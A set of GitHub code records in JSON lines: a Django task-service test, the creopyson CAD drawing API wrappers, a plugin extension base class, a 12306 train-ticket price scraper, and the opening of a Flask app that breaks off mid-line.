+{"seq_id":"18808827388","text":"from django.test import TestCase\nfrom productivity.services.TaskService import TaskService\nfrom productivity.services.ProjectService import ProjectService\nimport unittest\n\nclass TestTaskService(TestCase):\n\n @unittest.skip(\"Bug in todoist api\")\n def test_CRUD_task(self) -> None:\n project = ProjectService.createProject(\n \"test task project\"\n )\n content = \"test CRUS TaskService\"\n desc = \"test CRUD desc\"\n priority = 2\n task = TaskService.createTask(\n content = content,\n description = desc,\n project=project,\n priority=priority\n )\n task = TaskService.getTask(task.id)\n self.assertEqual(task.content, content)\n self.assertEqual(task.project, project)\n self.assertEqual(task.description, desc)\n self.assertEqual(task.priority, priority)\n\n new_content = \"test CRUD updated\"\n new_priority = 4\n new_project = ProjectService.createProject(\n \"test new CRDU project\"\n )\n task.content = new_content\n task.priority = new_priority\n task.project = new_project\n TaskService.updateTask(task)\n task = TaskService.getTask(task.id)\n self.assertEqual(task.content, content)\n self.assertEqual(task.project, project)\n self.assertEqual(task.description, desc)\n self.assertEqual(task.priority, priority)\n\n TaskService.deleteTask(task)\n self.assertFalse(\n task.id in [task.id for task in TaskService.get_tasks()]\n )\n\n def test_get_mark_complate(self) -> None:\n pass\n\n def test_todoist_persistance(self) -> None:\n pass\n","repo_name":"NathanRoseCE/RoseCore_Server","sub_path":"rosecore/productivity/tests/TestTaskService.py","file_name":"TestTaskService.py","file_ext":"py","file_size_in_byte":1694,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"73872806766","text":"\"\"\"Drawing module.\"\"\"\n\n\ndef add_model(client, model, drawing=None):\n \"\"\"Add a model to a drawing.\n\n Args:\n client (obj):\n creopyson Client.\n model (str):\n Model name.\n drawing (str, optional):\n Drawing name. Defaults is Current active drawing.\n\n Returns:\n None\n\n \"\"\"\n data = {\"model\": model}\n if drawing is not None:\n data[\"drawing\"] = drawing\n return client._creoson_post(\"drawing\", \"add_model\", data)\n\n\ndef add_sheet(client, position=None, drawing=None):\n \"\"\"Add a drawing sheet.\n\n Args:\n client (obj):\n creopyson Client.\n position (int, optional):\n Position to add the sheet.\n Defaults: Sheet will be added to the end.\n drawing (str, optional):\n Drawing name. Defaults is current active drawing.\n\n Returns:\n None\n\n \"\"\"\n data = {}\n if position is not None:\n data[\"position\"] = position\n if drawing is not None:\n data[\"drawing\"] = drawing\n return client._creoson_post(\"drawing\", \"add_sheet\", data)\n\n\ndef create(\n client,\n template,\n model=None,\n drawing=None,\n scale=None,\n display=None,\n activate=None,\n new_window=None,\n):\n \"\"\"Create a new drawing from a template.\n\n Args:\n client (obj):\n creopyson Client.\n template (str):\n Template\n model (str, optional):\n Model name. Defaults: Current active model.\n drawing (str, optional):\n New drawing name.\n Defaults: A name derived from the model's instance name.\n scale (float, optional):\n Drawing scale. Defaults is `1.0`.\n display (boolean, optional):\n Display the drawing after open. Defaults is False.\n activate (boolean, optional):\n Activate the drawing window after open. Defaults is False.\n new_window (boolean, optional):\n Open drawing in a new window. Defaults is False.\n\n Returns:\n (str): New drawing name.\n\n \"\"\"\n data = {\"template\": template}\n if model is not None:\n data[\"model\"] = model\n if drawing is not None:\n data[\"drawing\"] = drawing\n if scale is not None:\n data[\"scale\"] = scale\n if display is not None:\n data[\"display\"] = display\n if activate is not None:\n data[\"activate\"] = activate\n if new_window is not None:\n data[\"new_window\"] = new_window\n return client._creoson_post(\"drawing\", \"create\", data, \"drawing\")\n\n\ndef create_gen_view(\n client,\n model_view,\n point,\n drawing=None,\n view=None,\n sheet=None,\n model=None,\n scale=None,\n display_data=None,\n exploded=None,\n):\n \"\"\"Create general view on a drawing.\n\n Args:\n client (obj):\n creopyson Client\n model_view (str):\n Model view to use for the drawing view orientation.\n point (dict):\n Coordinates for the view in Drawing Units.\n drawing (str, optional):\n Drawing name. Defaults: current active drawing.\n view (str, optional):\n New view name. Defaults: the model_view parameter.\n sheet (int, optional):\n Sheet number. Defaults: current active sheet on the drawing.\n model (str, optional):\n Model for the view. Defaults: current active model on the drawing.\n scale (float, optional):\n View scale. Defaults: the sheet's scale.\n display_data (dict, optional):\n Display parameters used to create the view.\n Defaults: Creo defaults.\n exploded (boolean, optional):\n Whether to create the view as an exploded view. Defaults is False.\n\n Returns:\n None\n\n \"\"\"\n data = {\"model_view\": model_view, \"point\": point}\n if drawing is not None:\n data[\"drawing\"] = drawing\n if view is not None:\n data[\"view\"] = view\n if sheet is not None:\n data[\"sheet\"] = sheet\n if model is not None:\n data[\"model\"] = model\n if scale is not None:\n data[\"scale\"] = scale\n if display_data is not None:\n data[\"display_data\"] = display_data\n if exploded is not None:\n data[\"exploded\"] = exploded\n return client._creoson_post(\"drawing\", \"create_gen_view\", data)\n # TODO: JLpoint Method for point\n # TODO: ViewDisplayData method for display_data\n\n\ndef create_proj_view(\n client,\n parent_view,\n point,\n drawing=None,\n view=None,\n sheet=None,\n display_data=None,\n exploded=None,\n):\n \"\"\"Create projection view on a drawing.\n\n When specifying the view coordinates, you should specify only an X or a Y\n coordinate to avoid confusion. If you specify both coordinates, it\n appears Creo may be using whichever has the larger absolute value.\n\n Args:\n client (obj):\n creopyson Client\n parent_view (str):\n Parent view for the projection view.\n point (dict):\n Coordinates for the view, relative to the location\n of the parent view, in Drawing Units.\n drawing (str, optional):\n Drawing name. Defaults: current active drawing.\n view (str, optional):\n New view name. Defaults: Creo's default name for a new view.\n sheet (int, optional):\n Sheet number. Defaults: current active sheet on the drawing.\n display_data (dict, optional):\n Display parameters used to create the view.\n Defaults: the display parameters of the parent view.\n exploded (boolean, optional):\n Whether to create the view as an exploded view. Defaults is False.\n\n Returns:\n None\n\n \"\"\"\n data = {\"parent_view\": parent_view, \"point\": point}\n if drawing is not None:\n data[\"drawing\"] = drawing\n if view is not None:\n data[\"view\"] = view\n if sheet is not None:\n data[\"sheet\"] = sheet\n if display_data is not None:\n data[\"display_data\"] = display_data\n if exploded is not None:\n data[\"exploded\"] = exploded\n return client._creoson_post(\"drawing\", \"create_proj_view\", data)\n\n\ndef create_symbol(\n client, symbol_file, point, drawing=None, replace_values=None, sheet=None\n):\n \"\"\"Add a symbol instance to a drawing.\n\n Args:\n client (obj):\n creopyson Client\n symbol_file (str):\n Name of the symbol file.\n point (dict):\n Coordinates for the symbol in Drawing Units.\n drawing (str, optional):\n Drawing name. Defaults: current active drawing.\n replace_values (dict, optional):\n Object containing replacement values for any\n variable text in the symbol. Defaults to None.\n sheet (int, optional):\n Sheet number (0 for all sheets).\n Defaults: the symbol will be added to all sheets.\n\n Returns:\n None\n\n \"\"\"\n data = {\"symbol_file\": symbol_file, \"point\": point}\n if drawing is not None:\n data[\"drawing\"] = drawing\n if replace_values is not None:\n data[\"replace_values\"] = replace_values\n if sheet is not None:\n data[\"sheet\"] = sheet\n return client._creoson_post(\"drawing\", \"create_symbol\", data)\n\n\ndef delete_models(client, model=None, drawing=None, delete_views=None):\n \"\"\"Delete one or more models from a drawing.\n\n Args:\n client (obj):\n creopyson Client\n model (str, optional):\n Model name (wildcard allowed: True).\n Defaults: all models will be deleted from the drawing.\n drawing (str, optional):\n Drawing name. Defaults: current active drawing.\n delete_views (boolean, optional):\n Whether to delete drawing views associated with the model.\n Defaults is False.\n\n Returns:\n None\n\n \"\"\"\n data = {}\n if drawing is not None:\n data[\"drawing\"] = drawing\n if model is not None:\n data[\"model\"] = model\n if delete_views is not None:\n data[\"delete_views\"] = delete_views\n return client._creoson_post(\"drawing\", \"delete_models\", data)\n\n\ndef delete_sheet(client, sheet, drawing=None):\n \"\"\"Delete a drawing sheet.\n\n An error will occur if you try to delete the only sheet in a drawing.\n\n Args:\n client (obj):\n creopyson Client\n sheet (int):\n Sheet number.\n drawing (str, optional):\n Drawing name. Defaults: current active drawing.\n\n Returns:\n None\n\n \"\"\"\n data = {\"sheet\": sheet}\n if drawing is not None:\n data[\"drawing\"] = drawing\n return client._creoson_post(\"drawing\", \"delete_sheet\", data)\n\n\ndef delete_symbol_def(client, symbol_file, drawing=None):\n \"\"\"Delete a symbol definition and its instances from a drawing.\n\n Args:\n client (obj):\n creopyson Client\n symbol_file (str):\n Name of the symbol file.\n drawing (str, optional):\n Drawing name. Defaults: current active drawing.\n\n Returns:\n None\n\n \"\"\"\n data = {\"symbol_file\": symbol_file}\n if drawing is not None:\n data[\"drawing\"] = drawing\n return client._creoson_post(\"drawing\", \"delete_symbol_def\", data)\n\n\ndef delete_symbol_inst(client, symbol_id, drawing=None):\n \"\"\"Delete a specific symbol instance from a drawing.\n\n Args:\n client (obj):\n creopyson Client\n symbol_id (str):\n ID of the symbol instance.\n drawing (str, optional):\n Drawing name. Defaults: current active drawing.\n\n Returns:\n None\n\n \"\"\"\n data = {\"symbol_id\": symbol_id}\n if drawing is not None:\n data[\"drawing\"] = drawing\n return client._creoson_post(\"drawing\", \"delete_symbol_inst\", data)\n\n\ndef delete_view(client, view, drawing=None, sheet=None, del_children=None):\n \"\"\"Delete a drawing view.\n\n Args:\n client (obj):\n creopyson Client\n view (str):\n View name.\n drawing (str, optional):\n Drawing name. Defaults: current active drawing.\n sheet (int, optional):\n Sheet number; if filled in, the view will only be deleted if it is\n on that sheet. Defaults: Delete the view from any sheet.\n del_children ([boolean, optional):\n Whether to also delete any children of the view. Defaults is False.\n\n Returns:\n None\n\n \"\"\"\n data = {\"view\": view}\n if drawing is not None:\n data[\"drawing\"] = drawing\n if sheet is not None:\n data[\"sheet\"] = sheet\n if del_children is not None:\n data[\"del_children\"] = del_children\n return client._creoson_post(\"drawing\", \"delete_view\", data)\n\n\ndef get_cur_model(client, drawing=None):\n \"\"\"Get the active model on a drawing.\n\n Args:\n client (obj):\n creopyson Client\n drawing (str, optional):\n Drawing name. Defaults: current active drawing.\n\n Returns:\n (str): Model name.\n\n \"\"\"\n data = {}\n if drawing is not None:\n data[\"drawing\"] = drawing\n return client._creoson_post(\"drawing\", \"get_cur_model\", data, \"file\")\n\n\ndef get_cur_sheet(client, drawing=None):\n \"\"\"Get the current drawing sheet.\n\n Args:\n client (obj):\n creopyson Client\n drawing (str, optional):\n Drawing name. Defaults: current active drawing.\n\n Returns:\n (int): Sheet number.\n\n \"\"\"\n data = {}\n if drawing is not None:\n data[\"drawing\"] = drawing\n return client._creoson_post(\"drawing\", \"get_cur_sheet\", data, \"sheet\")\n\n\ndef get_num_sheets(client, drawing=None):\n \"\"\"Get the number of sheets on a drawing.\n\n Args:\n client (obj):\n creopyson Client\n drawing (str, optional):\n Drawing name. Defaults: current active drawing.\n\n Returns:\n (int): Number of sheets.\n\n \"\"\"\n data = {}\n if drawing is not None:\n data[\"drawing\"] = drawing\n return client._creoson_post(\"drawing\", \"get_num_sheets\", data, \"num_sheets\")\n\n\ndef get_sheet_format(client, sheet, drawing=None):\n \"\"\"Get the drawing format file of drawing sheet.\n\n Args:\n client (obj):\n creopyson Client.\n sheet (int):\n Sheet number.\n drawing (str, optional):\n Drawing name. Defaults: current active drawing.\n\n Returns:\n (dict):\n file(str):\n Format file name, may be null if there is no current format.\n full_name(str):\n Format full name.\n common_name(str):\n Format common name.\n\n \"\"\"\n data = {\"sheet\": sheet}\n if drawing is not None:\n data[\"drawing\"] = drawing\n return client._creoson_post(\"drawing\", \"get_sheet_format\", data)\n\n\ndef get_sheet_scale(client, sheet, drawing=None, model=None):\n \"\"\"Get the scale of a drawing sheet.\n\n Args:\n client (obj):\n creopyson Client\n sheet (int):\n Sheet number.\n drawing (str, optional):\n Drawing name. Defaults: current active drawing.\n model (str, optional):\n Drawing model used to calculate the scale.\n Defaults: the active model on the drawing.\n\n Returns:\n (float): Sheet scale.\n\n \"\"\"\n data = {\"sheet\": sheet}\n if drawing is not None:\n data[\"drawing\"] = drawing\n if model is not None:\n data[\"model\"] = model\n return client._creoson_post(\"drawing\", \"get_sheet_scale\", data, \"scale\")\n\n\ndef get_sheet_size(client, sheet, drawing=None):\n \"\"\"Get the size of a drawing sheet.\n\n Args:\n client (obj):\n creopyson Client\n sheet (int):\n Sheet number.\n drawing (str, optional):\n Drawing name. Defaults: current active drawing.\n\n Returns:\n (str): Sheet size.\n\n \"\"\"\n data = {\"sheet\": sheet}\n if drawing is not None:\n data[\"drawing\"] = drawing\n return client._creoson_post(\"drawing\", \"get_sheet_size\", data, \"size\")\n\n\ndef get_view_loc(client, view, drawing=None):\n \"\"\"Get the location of a drawing view.\n\n Args:\n client (obj):\n creopyson Client\n view (str):\n View name.\n drawing (str, optional):\n Drawing name. Defaults: current active drawing.\n\n Returns:\n (dict):\n x (float): X-coordinate of the view\n y (float): Y-coordinate of the view\n z (float): Z-coordinate of the view\n\n \"\"\"\n data = {\"view\": view}\n if drawing is not None:\n data[\"drawing\"] = drawing\n return client._creoson_post(\"drawing\", \"get_view_loc\", data)\n # TODO: return a tuple (x,y,z)?\n\n\ndef get_view_scale(client, view, drawing=None):\n \"\"\"Get the scale of a drawing view.\n\n Args:\n client (obj):\n creopyson Client\n view (str):\n View name.\n drawing (str, optional):\n Drawing name. Defaults: current active drawing.\n\n Raises:\n Warning: error message from creoson.\n\n Returns:\n (float): View scale.\n\n \"\"\"\n data = {\"view\": view}\n if drawing is not None:\n data[\"drawing\"] = drawing\n return client._creoson_post(\"drawing\", \"get_view_scale\", data, \"scale\")\n\n\ndef get_view_sheet(client, view, drawing=None):\n \"\"\"Get the sheet number that contains a drawing view.\n\n Args:\n client (obj):\n creopyson Client\n view (str):\n View name.\n drawing (str, optional):\n Drawing name. Defaults: current active drawing.\n\n Returns:\n (int): Sheet number.\n\n \"\"\"\n data = {\"view\": view}\n if drawing is not None:\n data[\"drawing\"] = drawing\n return client._creoson_post(\"drawing\", \"get_view_sheet\", data, \"sheet\")\n\n\ndef is_symbol_def_loaded(client, symbol_file, drawing=None):\n \"\"\"Check whether a symbol definition file is loaded into Creo.\n\n Args:\n client (obj):\n creopyson Client\n symbol_file (str):\n Name of the symbol file.\n drawing (str, optional):\n Drawing name. Defaults: current active drawing.\n\n Returns:\n (boolean): Whether the symbol definition is loaded into Creo.\n\n \"\"\"\n data = {\"symbol_file\": symbol_file}\n if drawing is not None:\n data[\"drawing\"] = drawing\n return client._creoson_post(\"drawing\", \"is_symbol_def_loaded\", data, \"loaded\")\n\n\ndef list_models(client, model=None, drawing=None):\n \"\"\"List the models contained in a drawing.\n\n Args:\n client (obj):\n creopyson Client\n model (str, optional):\n Model name filter (wildcards allowed: True).\n Defaults: no filter.\n drawing (str, optional):\n Drawing name. Defaults: current active drawing.\n\n Returns:\n (list:str): List of model names in the drawing.\n\n \"\"\"\n data = {}\n if drawing is not None:\n data[\"drawing\"] = drawing\n if model is not None:\n data[\"model\"] = model\n return client._creoson_post(\"drawing\", \"list_models\", data, \"files\")\n\n\ndef list_symbols(client, drawing=None, symbol_file=None, sheet=None):\n \"\"\"List symbols contained on a drawing.\n\n Args:\n client (obj):\n creopyson Client\n drawing (str, optional):\n Drawing name. Defaults: current active drawing.\n symbol_file (str, optional):\n Symbol file name filter. Defaults: no filter.\n sheet (int, optional):\n Sheet number (0 for all sheets).\n Defaults: The symbol will be added to all sheets.\n\n Returns:\n (list:dict):\n List of symbols in the drawing.\n id (int): Symbol ID.\n symbol_name (str): Symbol name.\n sheet (int): Sheet number.\n\n \"\"\"\n data = {}\n if drawing is not None:\n data[\"drawing\"] = drawing\n if symbol_file is not None:\n data[\"symbol_file\"] = symbol_file\n if sheet is not None:\n data[\"sheet\"] = sheet\n return client._creoson_post(\"drawing\", \"list_symbols\", data, \"symbols\")\n\n\ndef list_view_details(client, view=None, drawing=None):\n \"\"\"List the views contained in a drawing, with more details.\n\n Args:\n client (obj):\n creopyson Client\n view (str, optional):\n View name filter (wildcards allowed: True). Defaults: no filter.\n drawing (str, optional):\n Drawing name. Defaults: current active drawing.\n\n Returns:\n (list:dict):\n List of views in the drawing\n name (str):\n View name.\n sheet (int):\n Sheet number.\n location (dict):\n Coordonates\n x (float): X-coordinate of the view\n y (float): Y-coordinate of the view\n z (float): Z-coordinate of the view\n text_height (float):\n Text Heigh in Drawing Units.\n view_model (str):\n View model name.\n simp_rep (str):\n View simplified rep name.\n\n \"\"\"\n data = {}\n if drawing is not None:\n data[\"drawing\"] = drawing\n if view is not None:\n data[\"view\"] = view\n return client._creoson_post(\"drawing\", \"list_view_details\", data, \"views\")\n\n\ndef list_views(client, view=None, drawing=None):\n \"\"\"List the views contained in a drawing.\n\n Args:\n client (obj):\n creopyson Client\n view (str, optional):\n View name filter (wildcards allowed: True). Defaults: no filter.\n drawing (str, optional):\n Drawing name. Defaults: current active drawing.\n\n Returns:\n (list:str): List of views in the drawing.\n\n \"\"\"\n data = {}\n if drawing is not None:\n data[\"drawing\"] = drawing\n if view is not None:\n data[\"view\"] = view\n return client._creoson_post(\"drawing\", \"list_views\", data, \"views\")\n\n\ndef load_symbol_def(client, symbol_file, symbol_dir=None, drawing=None):\n \"\"\"Load a Creo symbol definition file into Creo from disk.\n\n Args:\n client (obj):\n creopyson Client\n symbol_file (str):\n Name of the symbol file.\n symbol_dir (str, optional):\n Directory containing the symbol file; if relative,\n assumed to be relative to Creo's current working directory.\n Defaults: Creo's current working directory.\n drawing (str, optional):\n Drawing name. Defaults: current active drawing.\n\n Returns:\n (dict): Symbol definition.\n id (int): ID of the loaded symbol.\n name (str): Symbol Name of the loaded symbol.\n\n \"\"\"\n data = {\"symbol_file\": symbol_file}\n if drawing is not None:\n data[\"drawing\"] = drawing\n if symbol_dir is not None:\n data[\"symbol_dir\"] = symbol_dir\n return client._creoson_post(\"drawing\", \"load_symbol_def\", data)\n\n\ndef regenerate(client, drawing=None):\n \"\"\"Regenerate a drawing.\n\n Args:\n client (obj):\n creopyson Client\n drawing (str, optional):\n Drawing name. Defaults: current active drawing.\n\n Returns:\n None\n\n \"\"\"\n data = {}\n if drawing is not None:\n data[\"drawing\"] = drawing\n return client._creoson_post(\"drawing\", \"regenerate\", data)\n\n\ndef regenerate_sheet(client, sheet=None, drawing=None):\n \"\"\"Regenerate a sheet on a drawing.\n\n Args:\n client (obj):\n creopyson Client\n sheet (int, optional):\n Sheet number (0 for all sheets).\n Defaults: all sheets will be regenerated.\n drawing (str, optional):\n Drawing name. Defaults: current active drawing.\n\n Returns:\n None\n\n \"\"\"\n data = {}\n if sheet is not None:\n data[\"sheet\"] = sheet\n if drawing is not None:\n data[\"drawing\"] = drawing\n return client._creoson_post(\"drawing\", \"regenerate_sheet\", data)\n\n\ndef rename_view(client, view, new_view, drawing=None):\n \"\"\"Rename a drawing view.\n\n Args:\n client (obj):\n creopyson Client\n view (str):\n Old view name.\n new_view (str):\n New view name.\n drawing (str, optional):\n Drawing name. Defaults: current active drawing.\n\n Returns:\n None\n\n \"\"\"\n data = {\"view\": view, \"new_view\": new_view}\n if drawing is not None:\n data[\"drawing\"] = drawing\n return client._creoson_post(\"drawing\", \"rename_view\", data)\n\n\ndef scale_sheet(client, sheet, scale, drawing=None, model=None):\n \"\"\"Set the scale of a drawing sheet.\n\n Args:\n client (obj):\n creopyson Client\n sheet (int):\n Sheet number.\n scale (float):\n View scale.\n drawing (str, optional):\n Drawing name. Defaults: current active drawing.\n model (str, optional):\n Drawing model to scale. Defaults: tThe active model on the drawing.\n\n Returns:\n None\n\n \"\"\"\n data = {\"sheet\": sheet, \"scale\": scale}\n if drawing is not None:\n data[\"drawing\"] = drawing\n if model is not None:\n data[\"model\"] = model\n return client._creoson_post(\"drawing\", \"scale_sheet\", data)\n\n\ndef scale_view(client, scale, view=None, drawing=None):\n \"\"\"Set the scale of one or more drawing views.\n\n Args:\n client (obj):\n creopyson Client\n scale (float):\n View scale.\n view (str, optional):\n View name (wildcards allowed: True).\n Defaults: all views will be scaled.\n drawing (str, optional):\n Drawing name. Defaults: current active drawing.\n\n Returns:\n (dict)\n succes_views (list):\n List of view which were successfully scaled.\n failed_views (list):\n List of view which failed to scale.\n\n \"\"\"\n data = {\"scale\": scale}\n if drawing is not None:\n data[\"drawing\"] = drawing\n if view is not None:\n data[\"view\"] = view\n return client._creoson_post(\"drawing\", \"scale_view\", data)\n\n\ndef select_sheet(client, sheet, drawing=None):\n \"\"\"Make a drawing sheet the current sheet.\n\n Args:\n client (obj):\n creopyson Client\n sheet (int):\n Sheet number.\n drawing (str, optional):\n Drawing name. Defaults: current active drawing.\n\n Returns:\n None\n\n \"\"\"\n data = {\"sheet\": sheet}\n if drawing is not None:\n data[\"drawing\"] = drawing\n return client._creoson_post(\"drawing\", \"select_sheet\", data)\n\n\ndef set_cur_model(client, model, drawing=None):\n \"\"\"Set the active model on a drawing.\n\n Args:\n client (obj):\n creopyson Client\n model (str):\n Model name.\n drawing (str, optional):\n Drawing name. Defaults: current active drawing.\n\n Returns:\n None\n\n \"\"\"\n data = {\"model\": model}\n if drawing is not None:\n data[\"drawing\"] = drawing\n return client._creoson_post(\"drawing\", \"set_cur_model\", data)\n\n\ndef set_sheet_format(client, sheet, file_format, dirname=None, drawing=None):\n \"\"\"Set the drawing format file of a drawing sheet.\n\n Args:\n client (obj):\n creopyson Client.\n sheet (int):\n Sheet number.\n file_format (str):\n Format file name.\n dirname (str, optional): Directory name containing the file format.\n Defaults to None is current working directory.\n drawing (str, optional):\n Drawing name. Defaults to None is current active drawing.\n\n Returns:\n None\n \"\"\"\n data = {\"sheet\": sheet, \"dirname\": dirname}\n if drawing is not None:\n data[\"drawing\"] = drawing\n if file_format is not None:\n data[\"file\"] = file_format\n return client._creoson_post(\"drawing\", \"set_sheet_format\", data)\n\n\ndef set_view_loc(client, view, point, drawing=None):\n \"\"\"Set the location of a drawing view.\n\n Args:\n client (obj):\n creopyson Client\n view (str):\n View name.\n point (dict):\n Coordinates for the view in Drawing Units\n drawing (str, optional):\n Drawing name. Defaults: current active drawing.\n\n Returns:\n None\n\n \"\"\"\n data = {\"view\": view, \"point\": point}\n if drawing is not None:\n data[\"drawing\"] = drawing\n return client._creoson_post(\"drawing\", \"set_cur_model\", data)\n\n\ndef view_bound_box(client, view, drawing=None):\n \"\"\"Get the 2D bounding box for a drawing view.\n\n Args:\n client (obj):\n creopyson Client\n view (str):\n View name.\n drawing (str, optional):\n Drawing name. Defaults: current active drawing.\n\n Returns:\n (dict):\n xmin (float): Minimum X-coordinate of drawing view.\n xmax (float): Maximum X-coordinate of drawing view.\n ymin (float): Minimum Y-coordinate of drawing view.\n ymax (float): Maximum Y-coordinate of drawing view.\n\n \"\"\"\n data = {\"view\": view}\n if drawing is not None:\n data[\"drawing\"] = drawing\n return client._creoson_post(\"drawing\", \"view_bound_box\", data)\n","repo_name":"Zepmanbc/creopyson","sub_path":"creopyson/drawing.py","file_name":"drawing.py","file_ext":"py","file_size_in_byte":27224,"program_lang":"python","lang":"en","doc_type":"code","stars":49,"dataset":"github-code","pt":"2"}
+{"seq_id":"20938920114","text":"import inspect\r\n\r\nfrom parm.api.cursor import Cursor\r\nfrom parm.extensions.extension_registry import ExtensionRegistry\r\nfrom parm.api.execution_context import ExecutionContext\r\nfrom parm.extensions.injection_context import InjectionContext\r\n\r\n\r\nclass ExtensionBase:\r\n def __init__(self, extension_registry: ExtensionRegistry):\r\n self.extension_registry = extension_registry\r\n\r\n def load_extension(self, ext_type):\r\n self.extension_registry.load_extension(ext_type)\r\n\r\n\r\ndef injected_func(fn):\r\n if isinstance(fn, str):\r\n def decorator(func):\r\n func.injected_name = fn\r\n func.injected = True\r\n func.magic_getter = True\r\n return func\r\n return decorator\r\n\r\n fn.injected = True\r\n return fn\r\n\r\n\r\ndef magic_getter(fn):\r\n if isinstance(fn, str):\r\n def decorator(func):\r\n func.getter_name = fn\r\n func.injected = True\r\n func.magic_getter = True\r\n return func\r\n return decorator\r\n\r\n assert callable(fn)\r\n fn.injected = True\r\n fn.magic_getter = True\r\n return fn\r\n\r\n\r\ndef magic_setter(fn):\r\n if isinstance(fn, str):\r\n def decorator(func):\r\n func.setter_name = fn\r\n func.injected = True\r\n func.magic_setter = True\r\n return func\r\n return decorator\r\n\r\n fn.injected = True\r\n fn.magic_setter = True\r\n return fn\r\n\r\n\r\nclass ExecutionExtensionBase(ExtensionBase):\r\n def __init__(\r\n self,\r\n extension_registry: ExtensionRegistry,\r\n execution_context: ExecutionContext,\r\n injection_context: InjectionContext):\r\n\r\n super().__init__(extension_registry)\r\n self.execution_context = execution_context\r\n self.injection_context = injection_context\r\n\r\n self.load_injections()\r\n\r\n def get_methods(self):\r\n return inspect.getmembers(self, predicate=inspect.ismethod)\r\n\r\n def load_injections(self):\r\n for name, method in self.get_methods():\r\n if getattr(method, 'injected', False):\r\n if getattr(method, 'magic_getter', False):\r\n name = getattr(method, 'getter_name', name)\r\n self.injection_context.inject_magic_getter(name, method)\r\n elif getattr(method, 'magic_setter', False):\r\n name = getattr(method, 'setter_name', name)\r\n self.injection_context.inject_magic_setter(name, method)\r\n else:\r\n name = getattr(method, 'injected_name', name)\r\n self.injection_context.inject_global(name, method)\r\n\r\n @property\r\n def cursor(self) -> Cursor:\r\n return self.execution_context.cursor\r\n\r\n @cursor.setter\r\n def cursor(self, value: Cursor):\r\n assert isinstance(value, Cursor)\r\n self.execution_context.cursor = value\r\n\r\n @property\r\n def match_result(self):\r\n return self.execution_context.match_result\r\n\r\n @property\r\n def program(self):\r\n return self.execution_context.program\r\n\r\n def create_pattern(self, pattern):\r\n if isinstance(pattern, str):\r\n pattern = self.program.create_pattern(pattern)\r\n return pattern\r\n","repo_name":"chananele/parm","sub_path":"parm/extensions/extension_base.py","file_name":"extension_base.py","file_ext":"py","file_size_in_byte":3251,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"2"}
+{"seq_id":"2711063170","text":"#coding=utf-8\r\n\r\nimport requests\r\nimport json\r\nimport warnings\r\nimport time\r\n\r\ndef getLineList(src, dest):\r\n query_url='https://kyfw.12306.cn/otn/leftTicket/query'\r\n train_date='2017-06-29'\r\n from_station=src\r\n to_station=dest\r\n purpose_codes='ADULT'\r\n r=requests.get(query_url, params={'leftTicketDTO.train_date': train_date, 'leftTicketDTO.from_station': from_station, 'leftTicketDTO.to_station': to_station, 'purpose_codes': purpose_codes}, verify=False)\r\n obj=json.loads(r.text)\r\n lst=obj['data']['result']\r\n return lst\r\n\r\ndef getLine(src, dest):\r\n result=[[],[]]\r\n lst=getLineList(src, dest)\r\n for each in lst:\r\n tmp=each.split('|')\r\n s=tmp[3]+' '+src+' '+dest+' '+tmp[8]+' '+tmp[9]+' '+tmp[10]+' '\r\n price_url='https://kyfw.12306.cn/otn/leftTicket/queryTicketPrice'\r\n train_no=tmp[2]\r\n from_station_no=tmp[16]\r\n to_station_no=tmp[17]\r\n seat_types=tmp[35]\r\n train_date='2017-06-29'\r\n\r\n try:\r\n for i in range(6):\r\n if i>=5:\r\n raise IOError\r\n r=requests.get(price_url, params={'train_no': train_no, 'from_station_no': from_station_no, 'to_station_no': to_station_no, 'seat_types': seat_types, 'train_date': train_date}, verify=False)\r\n if(r.text.find('validateMessagesShowId')>=0):\r\n break\r\n time.sleep(3)\r\n\r\n obj=json.loads(r.text)\r\n if 'WZ' in obj['data']:\r\n s=s+obj['data']['WZ'][1:]\r\n elif 'O' in obj['data']:\r\n s=s+obj['data']['O'][1:]\r\n else:\r\n raise IOError\r\n result[0].append(s)\r\n\r\n except:\r\n s=s+'0.0'\r\n result[1].append(s)\r\n\r\n finally:\r\n print(s)\r\n\r\n time.sleep(2)\r\n\r\n return result\r\n\r\nwarnings.filterwarnings(\"ignore\")\r\n\r\nline_require=[]\r\nfp=open(\"./line_require.txt\", \"r\", encoding=\"utf-8\")\r\nfor line in fp:\r\n line=line.strip()\r\n if line==\"\": continue\r\n line_require.append(line.split(' '))\r\nfp.close()\r\n\r\nfp=open(\"./line.txt\", \"w\", encoding=\"utf-8\")\r\nfp_bad=open(\"./line_bad.txt\", \"w\", encoding=\"utf-8\")\r\nfor each in line_require:\r\n result=getLine(each[0], each[1])\r\n for line in result[0]:\r\n fp.write(line+'\\n')\r\n for line in result[1]:\r\n fp_bad.write(line+'\\n')\r\n fp.flush()\r\n fp_bad.flush()\r\n\r\nfp.close()\r\nfp_bad.close()\r\n","repo_name":"WanQiyang/12306_data","sub_path":"line.py","file_name":"line.py","file_ext":"py","file_size_in_byte":2444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"40215290552","text":"import os\n\nfrom cs50 import SQL\nfrom flask import Flask, flash, redirect, render_template, request, session, jsonify, json\nfrom flask_session import Session\nfrom tempfile import mkdtemp\nfrom datetime import timedelta\nfrom werkzeug.security import check_password_hash, generate_password_hash\n\nfrom helpers import *\n\n# Configure application\napp = Flask(__name__)\n# Ensure templates are auto-reloaded\napp.config[\"TEMPLATES_AUTO_RELOAD\"] = True\n\n\n@app.before_request\ndef make_session_permanent():\n session.permanent = True\n app.secret_key = os.environ.get('super secret')\n #app.permanent_session_lifetime = timedelta(minutes=100000)\n\n# Ensure responses aren't cached\n\n\n@app.after_request\ndef after_request(response):\n response.headers[\"Cache-Control\"] = \"no-cache, no-store, must-revalidate\"\n response.headers[\"Expires\"] = 0\n response.headers[\"Pragma\"] = \"no-cache\"\n return response\n\n\napp.config[\"SESSION_TYPE\"] = \"filesystem\"\nSession(app)\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n\n# Configure CS50 Library to use SQLite database\nconnection = sqlite3.connect(\"bookify.db\", check_same_thread=False)\ncrsr = connection.cursor()\ndb = SQL(\"sqlite:///bookify.db\")\n\n\n@app.route(\"/\", methods=[\"GET\", \"POST\"])\ndef index():\n if not session.get('id'):\n if not session.get('temp_data'):\n initialize_visitor_data()\n print(f\"\\n\\n\\n\\n{session['temp_data']}\\n\\n\\n\")\n\n if request.method == \"POST\":\n keywords = 